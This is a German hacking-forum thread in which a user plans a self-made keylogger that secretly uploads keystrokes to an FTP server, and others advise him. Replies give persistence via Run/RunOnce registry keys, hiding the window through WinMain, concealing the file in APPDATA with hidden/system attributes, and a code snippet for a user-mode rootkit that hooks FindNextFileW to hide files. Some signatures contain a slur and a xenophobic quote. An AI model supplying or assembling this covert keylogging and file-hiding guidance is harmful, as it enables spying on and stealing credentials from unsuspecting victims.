Seite 1 von 2 12 LetzteLetzte
Ergebnis 1 bis 10 von 13
  1. #1
    Stiller Leser
    Registriert seit
    23.07.2008
    Beiträge
    4

    Standard Keylogger self made

    Hallo,

    was das Programmieren an sich angeht hab ich wohl schon etwas erfahrung... aber im speziellen das Programmieren von solchen "nicht so legalen" programmen, da hab ich nicht so die ahnung.

    Aber um abhilfe zu schffen will ich mal nen kleinen Keylogger schreiben der alle x sec alle abgefangenen Tastaturabfragen auf einen ftp server schreibt.

    deshalb hab ich mir mal ne kleine liste gemacht von sachen die ich so brauche:
    -muss überall laufe... also keine fehler wenn bsp. .net framework nicht installiert ist --ich denke mit dem normalen c++ compiler kein problem(Code::Blocks?)
    -muss beim Systemstart mit starten --irgendwie in die regestrie schreiben?
    -muss unsichtbar sein --normales consolenprogramm unsichtbar machen?
    -muss sicher plazirt sein, damit man ihn nicht einfach löschen kann --keine ahnung^^
    -muss alle tastaturabfragen buffern bis sie auf dem ftp server gespeichert werden --ist machbaar
    -muss eine verbindung zu einem ftp server aufbauen und halten --kan man das mit den normalem c++ bibliotheken die jeder hat?
    -muss die abgefangenden tastaturanschläge alle x sec auf den ftp server laden --wie punkt dadrüber
    lieg ich so weit richtig oder hab ich irgendwas falsch überlegt?



    soweit zum theoretischen teil... jetzt fehlt nur noch code^^.
    Was ich jetzt suche ist nicht ein fertig compilierters programm sondern code beispiele mit denen ich die einzelnen punkte füllen kann.
    kann mir da jemand helfen?

  2. #2
    CIH-Virus Avatar von K-Gee
    Registriert seit
    17.05.2010
    Beiträge
    449

    Standard

    #Systemstart kannste per Registry eintrag machen z.B.: HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run

    Und auch HKLM (HKEY_LOCAL_MACHINE)
    same ole nigga.

  3. #3
    Fortgeschrittener
    Registriert seit
    26.10.2010
    Beiträge
    43

    Standard

    Zitat Zitat von zerod Beitrag anzeigen
    denke mit dem normalen c++ compiler kein problem(Code::Blocks?)
    Wenn du den Keylogger auf der Win32 API aufsetzt, kannst du den auch unter den gängigen Windows Distributionen benutzen. Wo kein .NET Framework ist wird auch keins verlangt. Ob du da jetzt Code::Blocks, wxdev-c++ oder Visual Express nimmst, spielt eigentlich keine Rolle.

    Zitat Zitat von zerod Beitrag anzeigen
    soweit zum theoretischen teil... jetzt fehlt nur noch code^^.
    Ich würde mich erstmal mit den einzelnen Komponenten befassen, bevor du anfängst den kompletten Aufbau zu planen.
    Die Basis eines Keyloggers ist ein Keyboard Hook.
    Dazu solltest du dich erstmal informieren was das überhaupt ist ( Hook (EDV) – Wikipedia) , danach kannst du Code Beispiele eines Keyboard Hooks (zb. unter dem Keyword c++ Keyboard Hook) im Google finden.

    Das ist erst mal genug Materie für den Anfang. So arbeitest du dich Schritt für Schritt in deine Punkte ein.
    Geändert von bytebuffer (28.10.2010 um 17:16 Uhr)
    ich habe keine besondere Begabung, sondern bin nur leidenschaftlich neugierig

  4. #4
    Capt'n Crunch
    Registriert seit
    10.07.2008
    Beiträge
    999

    Standard

    Zitat Zitat von K-Gee Beitrag anzeigen
    #Systemstart kannste per Registry eintrag machen z.B.: HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run

    Und auch HKLM (HKEY_LOCAL_MACHINE)
    brauch beei win 7 adminrechte wenn ich mich nicht irre... besser RunOnce nehmen
    bitcoin. Banking Is Necessary. Banks Are Not. - by Lincoln6Echo

    Das ganze Mysql usw is mir zu viel arbeit um es zu lernen

  5. #5
    Trojaner Avatar von motion
    Registriert seit
    12.09.2010
    Beiträge
    81

    Standard

    Unsichtbar würde das Programm werden, wenn du gar keine Console erstellst, ergo mit int APIENTRY WinMain [...] arbeiten.
    Sicher Plaziert wäre das Programm in einem Abgelegenen Ordner des Windowsverzeichnisses - Nachteil: Aminrechte benötigt. Du könntest das Programm aber auch irgendwo auf der Platte droppen und per Hook "verschwinden" lassen - ist aber wahrscheinlich zu kompliziert. Dritte Möglichkeit wäre die Datei einfach irgendwo unter einem Unscheinbaren Namen abzulegen (Ordner eines Spiels?).
    Zum Ftp Upload, ich würde dir empfehlen, eine Logdatei zu erstellen und die nicht alle paar Sekunden, sondern nach einer gewissen Anzahl Tastenschläge o.ä. hochzuladen um Traffic zu sparen.
    contact:
    :->moti0n[at]inbox[dot]ru - PGP-public_key
    :->motion@jabber.ccc.de

  6. #6
    Trojaner Avatar von luxury11
    Registriert seit
    30.05.2010
    Beiträge
    56

    Standard

    "..normalen c++ compiler kein problem(Code::Blocks?)"
    codeblocks++ main.c -o foo.exe ?

    regestrie
    Gibt nur Registry..

    normales consolenprogramm unsichtbar machen
    Würde dir eher dann zur Formanwendung raten anhand der WinAPIs
    WinMain und ApiEntry.

    muss sicher plazirt sein
    Sofern du plazieren meinst, reicht für dein Bedarf der APPDATA-Ordner aus,
    siehe MSDN.

    kan man das mit den normalem c++ bibliotheken die jeder hat?kan man das mit den normalem c++ bibliotheken die jeder hat?
    Ja, siehe Socketprogrammierung.

    PS: Bitte achte auf dein Deutsch
    Die Elf steht zwischen der 10 und der 12.

  7. #7
    DateMake Dialer Avatar von Dj Hackmaster A
    Registriert seit
    02.11.2010
    Beiträge
    115

    Standard

    codeblocks ist bester COMPILER
    Zitat Zitat von Shadowgamer
    Und solch sinnlosen Kommentare kannst du dir doch bitte sparen. Denn so merkt erst recht jeder das du, nicht nur Körperlich sondern auch Geistig, noch ein kleines Kind und auf dem Nivou eines Sonderschülers bist.
    Rätsel und obligatorischer Haftungsausschluss:

    "Ich muss niemanden anerkennen, der vom Staat lebt, diesen Staat ablehnt, für die Ausbildung seiner Kinder nicht vernünftig sorgt und ständig neue kleine Kopftuchmädchen produziert."

  8. #8
    Sobig Wurm
    Registriert seit
    18.03.2007
    Beiträge
    200

    Standard

    Code:Blocks ist garkein compiler,
    C:B ist eine IDE welche oft mit der gnu compiler collection (gcc) benutzt wird,
    man kann sich den compiler aber selbst aussuchen
    nuffing

  9. Folgende Benutzer haben sich für diesen Beitrag bedankt:

    motion (04.11.2010)

  10. #9
    Trojaner
    Registriert seit
    28.09.2010
    Beiträge
    53

    Standard

    Bezüglich Platzierung: Erstelle einfach einen unsichtbaren Order unter APPDATA. Dort sollte man dann eigendlich nicht drüber stolpern.

    Für einen unsichtbaren Ordner musst du per Code ersteinmal einen Ordner erstellen. Dann mit FileInfo (müsste in C++ so ähnlich heißen, sonst DirectoryInfo) das Attribut auf hidden stellen.

  11. #10
    Bad Times Virus
    Registriert seit
    14.03.2009
    Beiträge
    579

    Standard

    Code:
    #define HIDE_FILE_ATTRIBS FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_READONLY
    SetFileAttributes(Filename, HIDE_FILE_ATTRIBS);
    Aber das ist natürlich die allerschlechteste Methode uberhaupt.
    Besser wäre ein Rootkit. Zb für XP kriegt man eins in 11 zeilen hin. (Ok nicht wirklich. Bzw das rootkit (ring-3) schon aber das hooken sind nen paar zeilen mehr))
    Code:
    BOOL WINAPI Hooked_FindNextFileW(HANDLE hFindFile, LPWIN32_FIND_DATA lpFindFileData)
    {
        BOOL bReturn = Original_FindNextFileW(hFindFile, lpFindFileData);
        if(wcsstr(lpFindFileData->cFileName, TEXT("not.exe")) || wcsstr(lpFindFileData->cFileName, TEXT("config.bin")))
        {
            DebugA(TEXT("%USERPROFILE%\\Desktop\\RootkitDebug.log"), "[Hooked_FindNextFileW]File search blocked", (char*)lpFindFileData->cFileName, LSTRLEN(lpFindFileData->cFileName));
            bReturn = Hooked_FindNextFileW(hFindFile, lpFindFileData);
        }
        else
            DebugA(TEXT("%USERPROFILE%\\Desktop\\RootkitDebug.log"), "[Hooked_FindNextFileW]File search pass", (char*)lpFindFileData->cFileName, LSTRLEN(lpFindFileData->cFileName));
        return bReturn;
    }

Seite 1 von 2 12 LetzteLetzte

Ähnliche Themen

  1. itself made
    Von fuiluir009 im Forum Trashbox
    Antworten: 0
    Letzter Beitrag: 21.07.2010, 15:50
  2. Referat - Das Parfum [made by me]
    Von Apex im Forum Serious Discussions
    Antworten: 3
    Letzter Beitrag: 18.07.2010, 22:01
  3. [B]The Allrounder 1.0 (Beta) Made by Me Self =)
    Von HandyRipper im Forum VisualBasic
    Antworten: 10
    Letzter Beitrag: 12.09.2008, 20:22
  4. Trillian Skin made by Jax
    Von Jax im Forum GFX Showroom
    Antworten: 3
    Letzter Beitrag: 05.09.2007, 18:03

Stichworte

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •